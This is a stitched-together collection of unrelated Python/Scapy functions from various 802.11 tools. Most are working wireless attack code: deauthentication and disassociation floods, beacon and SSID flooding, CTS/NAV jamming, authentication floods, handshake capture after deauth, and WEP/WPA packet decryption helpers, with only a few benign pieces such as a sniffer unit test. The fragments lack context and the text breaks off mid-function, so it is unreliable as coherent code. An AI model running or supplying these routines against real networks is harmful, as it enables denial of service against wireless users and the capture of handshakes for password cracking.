def deBuilder(self, packet, stream, genFCS):
"""Return the decrypted packet"""
## Remove the FCS from the old packet body
postPkt = RadioTap(self.pt.byteRip(packet.copy(),
chop = True,
order = 'last',
output = 'str',
qty = 4))
## Remove RadioTap() info if required
if genFCS is False:
postPkt = RadioTap()/postPkt[RadioTap].payload
## Rip off the Dot11WEP layer
del postPkt[Dot11WEP]
## Add the stream to LLC
decodedPkt = postPkt/LLC(str(stream))
## Flip FCField bits accordingly
if decodedPkt[Dot11].FCfield == 65:
decodedPkt[Dot11].FCfield = 1
elif decodedPkt[Dot11].FCfield == 66:
decodedPkt[Dot11].FCfield = 2
## Return the decoded packet with or without FCS
if genFCS is False:
return decodedPkt
else:
return decodedPkt/Padding(load = binascii.unhexlify(self.pt.endSwap(hex(crc32(str(decodedPkt[Dot11])) & 0xffffffff)).replace('0x', '')))
def shoot(self, tgt):
self.__c_TGT = tgt
sniffer_thread = threading.Thread(target=self.start_eapol_sniffer)
sniffer_thread.daemon = True
sniffer_thread.start()
while not self.__SNIFFER_STATUS:
time.sleep(1)
__pkt_to_cl = RadioTap() / Dot11(
addr1=tgt, addr2=self.bssid,
addr3=self.bssid) / Dot11Deauth(reason=7)
__pkt_to_ap = RadioTap() / Dot11(
addr1=self.bssid, addr2=tgt, addr3=tgt) / Dot11Deauth(reason=7)
for n in range(32 * 1):
sendp(__pkt_to_cl, iface=self.iface, count=1, verbose=False)
sendp(__pkt_to_ap, iface=self.iface, count=1, verbose=False)
while self.__SNIFFER_STATUS:
time.sleep(1)
self.__SNIFFER_STATUS = not bool(self.__SNIFFER_STATUS)
if self.verify_handshake(tgt):
return (True, self.__c_HANDSHAKE)
else:
return (False, [])
def close(self):
"""
Disassociate from the access point, This does not veify that
the AP received the message and should be considred a
best-effort attempt.
errDict = {
-1:"Not Connected",
0:"No Error"
}
"""
if not self.connected:
return -1
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=0,
subtype=12) / Dot11Disas(reason=3),
iface=self.interface,
verbose=False)
sendp(RadioTap() / Dot11(addr1=self.dest_mac,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
type=0,
subtype=12) / Dot11Disas(reason=3),
iface=self.interface,
verbose=False)
self.connected = False
return 0
def send_beacon_ex(essid,
interface,
privacy=PRIVACY_NONE,
bssid=None,
channel=6):
"""
Convenience function for sending beacons without a thread or creating an instance
"""
if not bssid:
bssid = getHwAddr(interface)
channel = chr(channel)
sequence = randint(1200, 2000)
if privacy in [PRIVACY_NONE, 'none', 'NONE']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WEP, 'wep', 'WEP']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=42, info="\x04") / Dot11Elt(ID=47, info="\x04") /
Dot11Elt(ID=50, info="\x0c\x12\x18\x60"))
elif privacy in [PRIVACY_WPA, 'wpa', 'WPA']:
beacon = (
RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=bssid,
addr3=bssid,
SC=sequence) /
Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot') /
Dot11Elt(ID="SSID", info=essid) /
Dot11Elt(ID="Rates", info='\x82\x84\x8b\x96\x0c\x12\x18\x24') /
Dot11Elt(ID="DSset", info=channel) /
Dot11Elt(ID=221,
info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" +
"\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" +
"\x00\x50\xf2\x01") / Dot11Elt(ID=42, info="\x00") /
Dot11Elt(ID=50, info="\x30\x48\x60\x6c") / Dot11Elt(
ID=221,
info=
"\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00"
))
else:
raise Exception('Invalid privacy setting')
sendp(beacon, iface=interface, verbose=False)
def deauth(self, e):
global SEQ_NUM
pkts = []
deauth_pkt1 = RadioTap() / Dot11(addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac) / Dot11Deauth()
deauth_pkt2 = RadioTap() / Dot11(
addr1=self.ap_mac, addr2=self.client_mac,
addr3=self.client_mac) / Dot11Deauth()
'''
Channel Switch Announcement
+ Dot11
\x0d Action
+ Raw
\x00 Management
\x04 CSA
\x25 Element ID [37]
\x03 Length
\x00 Channel Switch Mode
\x04 New Channel Num
\x00 Channel Switch Count
'''
csa_pkt = RadioTap() / Dot11(
addr1=self.client_mac,
addr2=self.ap_mac,
addr3=self.ap_mac,
type=0,
subtype=0x0d) / Raw("\x00\x04\x25\x03\x00" +
chr(self.client_channel) + "\x00")
#csa_pkt = Jammer.append_csa(self.my_beacon, 56)
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
pkts.append(csa_pkt)
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
deauth_pkt1[RadioTap].notdecoded = deauth_pkt1[
RadioTap].notdecoded[:10] + channels[
self.ap_channel] + deauth_pkt1[RadioTap].notdecoded[12:]
logger.log("Starting deauth on AP [G]" + self.ap_mac + "[/G] (" +
self.ap_ssid + ") and client [G]" + self.client_mac +
"[/G]...")
while not e.isSet():
for p in pkts:
SEQ_NUM += 1
p[RadioTap].SC = SEQ_NUM
p[Dot11].FCfield |= 0x20
sendp(p, iface=self.iface_ap, inter=0.1 / len(pkts))
logger.log("Deauth [G]stopped[/G]")
def setPrivacy(self, value): """ Configure the privacy settings for None, WEP, and WPA """ if value == PRIVACY_NONE: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WEP: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60") elif value == PRIVACY_WPA: self.beacon = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11Beacon(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info=self.essid)/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
def forge_ap_cl(self):
_pkt_ap = RadioTap() / Dot11(addr1=self.cl,
addr2=self.ap,
addr3=self.ap) / Dot11Deauth(reason=7)
_pkt_cl = RadioTap() / Dot11(addr1=self.ap,
addr2=self.cl,
addr3=self.cl) / Dot11Deauth(reason=7)
if self.unlimited:
while True:
self.flood_ap_cl(_pkt_ap, _pkt_cl)
else:
for _count in range(0, self.count):
self.flood_ap_cl(_pkt_ap, _pkt_cl)
def perform_deauth(router, client, iface):
pckt = RadioTap() / Dot11(addr1=client, addr2=router, addr3=router) / Dot11Deauth(reason=4)
cli_to_ap_pckt = RadioTap() / Dot11(addr1=router, addr2=client, addr3=client) / Dot11Deauth(reason=7)
print('Sending Deauth to ' + client + ' from ' + router)
try:
for i in range(100):
sendp(pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
sendp(cli_to_ap_pckt, inter=0.1, count=1, loop=0, iface=iface, verbose=0)
print("\U0001F608")
except Exception as e:
print(f"error: {e}")
def start():
ap = args.bssid
client = args.client
pkt = RadioTap()/Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
pkt1 = RadioTap()/Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
for n in range(int(args.number)):
sendp(pkt, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(ap, "green") + " (ap) > " + termcolor(client, "blue") + " (client) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
sleep(0.5)
sendp(pkt1, iface=args.iface, verbose=0)
print("Send deauth packet: " + termcolor(client, "blue") + " (client) > " + termcolor(ap, "green") + " (ap) via " +
termcolor(args.iface, "red") + " #" + str(n + 1))
def shoot(self, _sn, _rc):
_pkt_ap_to_cl = RadioTap() / Dot11(addr1=_rc, addr2=_sn,
addr3=_sn) / Dot11Deauth(reason=7)
_pkt_cl_to_ap = RadioTap() / Dot11(addr1=_sn, addr2=_rc,
addr3=_rc) / Dot11Deauth(reason=7)
sendp(_pkt_ap_to_cl,
iface=self.iface,
count=self.deauth,
verbose=False)
sendp(_pkt_cl_to_ap,
iface=self.iface,
count=self.deauth,
verbose=False)
time.sleep(0.80)
def sa_query_attack(interface, ap, sta):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
interface.inject(pkt)
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11AssoReq(cap=0x3104, listen_interval=0x0001) / Dot11Elt(ID=0, info="Wireless Attack Testbed") / \
Dot11EltRates() / Dot11Elt(ID='RSNinfo', info=(
'\x01\x00' # RSN Version 1
'\x00\x0f\xac\x04' # Group Cipher Suite : 00-0f-ac CCMP
'\x01\x00' # 2 Pairwise Cipher Suite (next line)
'\x00\x0f\xac\x04' # AES Cipher
'\x01\x00' # 1 Authentication Key Managment Suite (line below)
'\x00\x0f\xac\x02' # Pre-Shared Key
'\x80\x00')) # Supports MFP
interface.inject(pkt)
def deBuilder(self, tgtPkt, decrypted):
"""Return the decrypted packet"""
## This is our encrypted data we need to remove
eData = self.pt.byteRip(tgtPkt[Dot11WEP].wepdata, qty=4, chop=True)
## This is our decrypted everything, LLC included
dEverything = self.pt.byteRip(decrypted,
qty=16,
order='last',
chop=True)
## Prep the new pkt
newPkt = tgtPkt.copy()
del newPkt[Dot11WEP].wepdata
## Remove the last four bytes of new pkt and unhexlify
postPkt = RadioTap((self.pt.byteRip(newPkt.copy(),
chop=True,
order='last',
output='str',
qty=4)))
del postPkt[Dot11WEP]
## The data is proper in here
finalPkt = postPkt.copy() / LLC(
binascii.unhexlify(dEverything.replace(' ', '')))
## Flip FCField bits accordingly
if finalPkt[Dot11].FCfield == 65L:
finalPkt[Dot11].FCfield = 1L
elif finalPkt[Dot11].FCfield == 66L:
finalPkt[Dot11].FCfield = 2L
## Calculate and append the FCS
crcle = crc32(str(finalPkt[Dot11])) & 0xffffffff
if sys.byteorder == "little":
## Convert to big endian
crc = struct.pack('<L', crcle)
## Convert to long
(fcsstr, ) = struct.unpack('!L', crc)
### Need to research which NIC causes /Raw(fcs) to be needed
#fcs = bytearray.fromhex('{:32x}'.format(fcsstr))
#return finalPkt/Raw(fcs)
return finalPkt
def get_rsn_information(self, essid):
rsnInfo = None
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=4) / Dot11ProbeReq() /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11ProbeResp):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo is None:
rsnInfo = '' # Did not find rsnInfo in probe response.
else:
rsnInfo = build_rsn_data(parse_rsn_data(rsnInfo.info))
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def asso_frame_blueprint(self, ap, cl):
capibility = self.beacon.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}")
efields = self.enumerate_asso_fields(self.beacon)
return RadioTap() / Dot11(addr1=ap, addr2=cl, addr3=ap) / Dot11AssoReq(cap=capibility, listen_interval=3) / \
Dot11Elt(ID=efields[0]['ID'], len=efields[0]['len'], info=efields[0]['info']) / \
Dot11Elt(ID=efields[1]['ID'], len=efields[1]['len'], info=efields[1]['info']) / \
Dot11Elt(ID=efields[48]['ID'], len=efields[48]['len'], info=efields[48]['info'])
def test_new_packet(self):
"""
Tests the 'new_packet' method.
"""
config = Config()
new_packets = Queue()
sniffer = PacketSniffer(config, new_packets)
self.assertEqual(sniffer.new_packets.qsize(), 0)
packet = RadioTap() \
/ Dot11(
addr1="ff:ff:ff:ff:ff:ff",
addr2="aa:bb:cc:11:22:33",
addr3="dd:ee:ff:11:22:33"
) \
/ Dot11ProbeReq() \
/ Dot11Elt(
info="Test"
)
sniffer.new_packet(packet)
self.assertEqual(sniffer.new_packets.qsize(), 1)
ProbeRequestParser.parse(sniffer.new_packets.get(timeout=1))
def ssidFlood(ssid, senderMAC, channel): dot11 = Dot11(type=0, subtype=8, addr1="ff:ff:ff:ff:ff:ff", addr2=senderMAC, addr3=senderMAC) beacon = Dot11Beacon(cap="ESS+privacy") essid = Dot11Elt(ID="SSID", info=ssid, len=len(ssid)) echann = Dot11Elt(ID="DSset", info=chr(channel)) frame = RadioTap()/dot11/beacon/essid/echann sendp(frame, inter=0.1, iface=args.iface, verbose=False, loop=1)
def pp_deauth(blacklist):
"""
Starts deauthentication attack for PineAP Suite.
"""
os.system("reset")
print "\033[1m" + banner_dos
print colored(
"\n------------------- ̿' ̿'\̵͇̿̿\з=(◕_◕)=ε/̵͇̿̿/'̿'̿ ---------------------\n̿",
"red")
print "\033[1m[--] TARGET(s): ", blacklist
time.sleep(1)
print "\033[1m[*] Deauthing PineAP client devices"
time.sleep(2)
print "\033[1m[*] Channel number being set\n"
time.sleep(2)
for d in blacklist:
clist = sniff(iface=iface, count=30)
channel = find_channel(clist, d)
os.system("iwconfig wlan1mon channel " + str(channel))
print "\033[1m[*] Sending 120 deauthentication packets to ", d
deauth = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=d.lower(),
addr3=d.lower()) / Dot11Deauth()
sendp(deauth, iface=iface, count=120, inter=.2, verbose=False)
time.sleep(1)
print "\033[1m[*] Attack completed"
time.sleep(2)
def cts_nav_attack(interface):
# http://matej.sustr.sk/publ/articles/cts-dos/cts-dos.en.html
# pkt = RadioTap(len=18, present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
pkt = RadioTap() / Dot11(type=1, subtype=12, ID=0xff7f, addr1="00:00:de:ad:be:ef")
while True:
interface.inject(pkt)
sleep(0.01)
def getRSNInformation(self, essid):
sendp(RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__unfuckupSC__(),
subtype=4) / Dot11ProbeReq() /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60'),
iface=self.interface,
verbose=False)
self.sequence += 1
sniff(iface=self.interface,
store=0,
timeout=self.timeout,
stop_filter=self.__stopfilter__)
if self.lastpacket == None or not self.lastpacket.haslayer(
'Dot11ProbeResp'):
return None
probeResp = self.lastpacket.getlayer(Dot11ProbeResp)
tmp = probeResp.getlayer(Dot11Elt)
while tmp:
if tmp.fields.get('ID') == 48:
rsnInfo = tmp
break
else:
tmp = tmp.payload
if rsnInfo == None:
rsnInfo = '' # we didn't find it in the probe response, so we'll return an empty string
else:
rsnInfo = parseRSNData(rsnInfo.info)
rsnInfo = buildRSNData(rsnInfo)
rsnInfo = '\x30' + chr(len(rsnInfo)) + rsnInfo
return rsnInfo
def send_wpa_enc(self, data, iv, seqnum, dest, mic_key,
key_idx=0, additionnal_flag=["from-DS"],
encrypt_key=None):
"""Send an encrypted packet with content @data, using IV @iv,
sequence number @seqnum, MIC key @mic_key
"""
if encrypt_key is None:
encrypt_key = self.tk
rep = RadioTap()
rep /= Dot11(
addr1=dest,
addr2=self.mac,
addr3=self.mac,
FCfield="+".join(['wep'] + additionnal_flag),
SC=(next(self.seq_num) << 4),
subtype=0,
type="Data",
)
# Assume packet is send by our AP -> use self.mac as source
# Encapsule in TKIP with MIC Michael and ICV
data_to_enc = build_MIC_ICV(raw(data), mic_key, self.mac, dest)
# Header TKIP + payload
rep /= Raw(build_TKIP_payload(data_to_enc, iv, self.mac, encrypt_key))
self.send(rep)
return rep
def search_n_destroy(iface: str):
setup_monitor(iface)
pkts_stream = sniff_gen(iface=iface)
for pkt in pkts_stream:
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
frame = (
RadioTap() / Dot11FCS(
subtype=8,
type="Data",
proto=0,
FCfield="to-DS",
addr1=pkt[Dot11].addr1,
addr2=pkt[Dot11].addr2,
addr3=pkt[Dot11].addr3,
) /
Dot11QoS(Reserved=0, Ack_Policy=0, EOSP=0, TID=0, TXOP=0) /
LLC(dsap=0xAA, ssap=0xAA, ctrl=3) /
SNAP(OUI=0x0, code="IPv4") / IP(version=4,
proto="udp",
src=pkt[IP].src,
dst=pkt[IP].dst) /
UDP(sport=6666, dport=5555) / Raw(load=bytes.fromhex(
"436d640001001200010404000a000000808080802020202010652f"
)))
sendp(frame, iface=iface)
break
def wpaEncrypt(encKey, origPkt, decodedPkt, PN, genFCS=True):
"""Encompasses the steps needed to encrypt a WPA packet
No structure for TKIP has been done as of yet
"""
## Increment the PN positively per IEEE spec
PN[5] += 1
## Grab the payload of the decoded packet
dEverything = decodedPkt[LLC]
## Remove the FCS from the original packet
newPkt = RadioTap((pt.byteRip(origPkt.copy(),
chop=True,
order='last',
output='str',
qty=4)))
del newPkt[Dot11WEP]
## The data is ready for encryption
newPkt = newPkt / dEverything
encodedPkt = ccmpCrypto.encryptCCMP(newPkt, encKey, PN, genFCS)
## Flip FCField bits accordingly
### DEBUG
# if encodedPkt[Dot11].FCfield == 1L:
# encodedPkt[Dot11].FCfield = 65L
# elif encodedPkt[Dot11].FCfield == 2L:
# encodedPkt[Dot11].FCfield = 66L
if encodedPkt[Dot11].FCfield == 1:
encodedPkt[Dot11].FCfield = 65
elif encodedPkt[Dot11].FCfield == 2:
encodedPkt[Dot11].FCfield = 66
return encodedPkt
def get_radiotap_header(self):
radiotap_packet = RadioTap(
len=18,
present='Flags+Rate+Channel+dBm_AntSignal+Antenna',
notdecoded='\x00\x6c' + get_frequency(self.channel) +
'\xc0\x00\xc0\x01\x00\x00')
return radiotap_packet
def send_ctrl_msg(json_data: str,
my_mac: str,
mon_interface: str = 'mon0') -> None:
a = RadioTap() / Dot11(addr1="ff:ff:ff:ff:ff:ff",
addr2=my_mac,
addr3="ff:ff:ff:ff:ff:ff") / json_data
sendp(a, iface=mon_interface, verbose=0)
def trigger_channel_switch_in_device(self, iface, sta_mac_addr,
target_channel, serving_channel,
**kwargs):
"""
Transmit Channel Switch Announcement
(CSA) beacon to the given STA.
"""
bssid = kwargs.get('bssid')
self.log.debug(
'Sending CSA to {} on iface {}'.format(sta_mac_addr, iface),
' with BSSID {} switch STA to channel {}'.format(
bssid, str(target_channel)))
# tbd: clean up this mess
data1 = ('3bc0904f0000000064000100000542494741500',
'1088c129824b048606c0301')
data2 = ('050400020000070c44452024081464051a84031a2d1a0c001bffff',
'0000000000000000000001000000000000000000003d162c000400',
'0000000000000000000000000000000000007f0800000000000000',
'40dd180050f2020101800003a4000027a4000042435d0062322e00',
'dd06aaaaaa3f4325dd14aaaaaa8020544b4e2d4c6f57532d537973',
'74656ddd06aaaaaa215a01250300')
beacon = (RadioTap() / Dot11(
type=0, subtype=8, addr1=sta_mac_addr, addr2=bssid, addr3=bssid) /
binascii.unhexlify(
data1 + hex(serving_channel).replace("0x", "") + data2 +
hex(target_channel).replace("0x", "") + '00'))
# tbd: do we really need this
BEACON_ARQ = 3
for ii in range(BEACON_ARQ):
# repetitive transmission
sendp(beacon, iface=iface)
return True
def __init__(self, interface, args):
self.interface = interface
self.args = args
## Create a header that works for encrypted wifi having FCS
### These bytes can be switched up, if memory serves, this is a channel 6 RadioTap()
rTap = '00 00 26 00 2f 40 00 a0 20 08 00 a0 20 08 00 00 20 c8 af c8 00 00 00 00 10 6c 85 09 c0 00 d3 00 00 00 d2 00 cd 01'
self.rTap = RadioTap(unhexlify(rTap.replace(' ', '')))
def _read_cmds_from_pcap(stream):
for pkt in stream:
if isinstance(pkt, Raw):
pkt = RadioTap(pkt)
if UDP in pkt:
dgram = pkt[UDP]
if dgram.dport == 5555:
yield dgram
def auth_attack(interface, sta, ap):
pkt = RadioTap() / Dot11(addr1=ap.bssid, addr2=sta.mac_addr, addr3=ap.bssid) / \
Dot11Auth(algo=0, seqnum=0x0001, status=0x0000)
while True:
cprint("ZZZ", 'blue')
interface.inject(pkt)
pkt.SC += 1
sleep(0.3)
def run(self, args, cmd):
self.cmd = cmd
with db_session:
bss = cmd.select_bss(args.ssid, args.bssid, args.client)
if bss:
if not args.bssid:
args.bssid = bss.bssid
if args.channel is None:
args.channel = bss.channel
if args.bssid is None:
cmd.perror("BSSID is missing, and couldn't be obtained from the recon db.")
elif args.channel is None:
cmd.perror("Channel is missing, and couldn't be obtained from the recon db.")
else:
interface = set_monitor_mode(args.iface)
if args.channel > 0:
check_chset(interface, args.channel)
else:
args.channel = pyw.chget(interface)
deauth_frame = RadioTap() / Dot11(addr1=args.client, addr2=args.bssid, addr3=args.bssid) / Dot11Deauth(
reason="class3-from-nonass")
args.num_frames = "infinite" if args.num_frames <= 0 else args.num_frames * 64
if compare_macs(args.client, BROADCAST_MAC):
cmd.pfeedback(
"[i] Sending {} deauth frames to all clients from AP {} on channel {}...".format(args.num_frames,
args.bssid,
args.channel))
else:
cmd.pfeedback(
"[i] Sending {} deauth frames to client {} from AP {} on channel {}...".format(args.num_frames,
args.client,
args.bssid,
args.channel))
if args.num_frames == "infinite":
self.inf_running = True
prev_sig_handler = signal.signal(signal.SIGINT, self.sig_int_handler)
cmd.pfeedback("[i] Press ctrl-c to stop.")
while self.inf_running:
try:
sendp(deauth_frame, iface=args.iface, count=64, inter=0.002)
except:
pass
sleep(0.5)
signal.signal(signal.SIGINT, prev_sig_handler)
else:
sendp(deauth_frame, iface=args.iface, count=args.num_frames, inter=0.002)
def connect(self, essid, rsnInfo=''):
"""
Connect/Associate with an access point.
errDict = {
-1:"Already Connected",
0:"No Error",
1:"Failed To Get Probe Response",
2:"Failed To Get Authentication Response",
3:"Failed To Get Association Response",
4:"Authentication Request Received Fail Response",
5:"Association Request Received Fail Response"
}
"""
# Dot11 Probe Request (to get authentication information if applicable)
payload = (RadioTap() / Dot11(
addr1=self.dest_mac, addr2=self.source_mac, addr3=self.dest_mac) /
Dot11Auth(seqnum=1))
self.__thread_sendp__(payload)
if rsnInfo is None: # None explicitly means go get it, leave it '' to proceed with out it
rsnInfo = self.get_rsn_information(essid)
if self.lastpacket is None or not self.lastpacket.haslayer(Dot11Auth):
return 2
if self.lastpacket.getlayer(Dot11Auth).status != 0:
return 4
#Dot11 Association Request
payload = (RadioTap() / Dot11(addr1=self.bssid,
addr2=self.source_mac,
addr3=self.bssid,
SC=self.__fixSC__(),
subtype=0) /
Dot11AssoReq(cap='ESS+short-preamble+short-slot',
listen_interval=10) /
Dot11Elt(ID=0, info=essid) /
Dot11Elt(ID=1, info='\x82\x84\x0b\x16\x24\x30\x48\x6c') /
Dot11Elt(ID=50, info='\x0c\x12\x18\x60') / rsnInfo)
self.__thread_sendp__(payload)
if self.lastpacket is None or not self.lastpacket.haslayer(
Dot11AssoResp):
return 3
if self.lastpacket.getlayer(Dot11AssoResp).status != 0:
return 5
self.connected = True
self.sequence = 0
return 0
def disassociate(self):
# Forge the dot11 disassociation packet
dis_packet = RadioTap()/Dot11(type=0, subtype=12, addr1=self.target_mac, addr2=self.other_mac, addr3=self.other_mac)/Dot11Deauth(reason=self.reason)
# Loop to send the disassociation packets to the victim device
while True:
# Repeat every delay value seconds
time.sleep(self.delay)
print("["+str(datetime.now().time())+"][+] Disassociation frames (reason "+str(self.reason)+") sent to target "+self.target_mac+" as sender endpoint "+self.other_mac)
sendp(dis_packet, iface=self.interface, count=self.num, verbose=False)
class ClientListener(threading.Thread):
"""
This object is a thread-friendly listener for Client connection
attempts.
The backlog corresponds to the size of the queue, if the queu is
full because the items are not being handled fast enough then new
association requests will be dropped and lost.
"""
def __init__(self, interface, backlog, essid = None, bssid = None):
threading.Thread.__init__(self)
self.interface = interface
self.backlog = backlog
self.essid = essid
if not bssid:
bssid = getHwAddr(interface)
self.bssid = bssid.lower()
self.lastpacket = None
self.client_queue = Queue.Queue(self.backlog) # FIFO
self.channel = "\x06"
self.sequence = randint(1200, 2000)
self.__shutdown__ = False
def __unfuckupSC__(self, fragment = 0):
"""
This is a reserved method to return the sequence number in a way
that is not f****d up by a bug in how the SC field is packed in
Scapy.
"""
if self.sequence >= 0xFFF:
self.sequence = 1
else:
self.sequence += 1
SC = (self.sequence - ((self.sequence >> 4) << 4) << 12) + (fragment << 8) + (self.sequence >> 4) # bit shifts FTW!
return unpack('<H', pack('>H', SC))[0]
def __stopfilter__(self, packet):
"""
This is the stop filter for Scapy to be used to check if the
packet was sent to EAPeak.
"""
if (packet.haslayer('Dot11Auth') or packet.haslayer('Dot11AssoReq')):
if getBSSID(packet) == self.bssid and getSource(packet) != self.bssid:
self.lastpacket = packet
return True
return False
elif packet.haslayer('Dot11ProbeReq'):
self.lastpacket = packet
return True
return False
def setPrivacy(self, value):
"""
Configure the privacy settings for None, WEP, and WPA
"""
if value == PRIVACY_NONE:
self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WEP:
self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=42, info="\x04")/Dot11Elt(ID=47, info="\x04")/Dot11Elt(ID=50, info="\x0c\x12\x18\x60")
elif value == PRIVACY_WPA:
self.probe_response_template = RadioTap()/Dot11(addr1="ff:ff:ff:ff:ff:ff", addr2=self.bssid, addr3=self.bssid)/Dot11ProbeResp(cap='ESS+privacy+short-preamble+short-slot')/Dot11Elt(ID="SSID",info='')/Dot11Elt(ID="Rates",info='\x82\x84\x8b\x96\x0c\x12\x18\x24')/Dot11Elt(ID="DSset",info=self.channel)/Dot11Elt(ID=221, info="\x00\x50\xf2\x01\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x02" + "\x01\x00" + "\x00\x50\xf2\x01")/Dot11Elt(ID=42, info="\x00")/Dot11Elt(ID=50, info="\x30\x48\x60\x6c")/Dot11Elt(ID=221, info="\x00\x50\xf2\x02\x01\x01\x84\x00\x03\xa4\x00\x00\x27\xa4\x00\x00\x42\x43\x5e\x00\x62\x32\x2f\x00")
def run(self):
"""
This is the thread routine that handles probe requests and sends
probe responses when appropriate.
"""
while not self.__shutdown__:
sniff(iface=self.interface, store=0, timeout=RESPONSE_TIMEOUT, stop_filter=self.__stopfilter__)
if self.lastpacket:
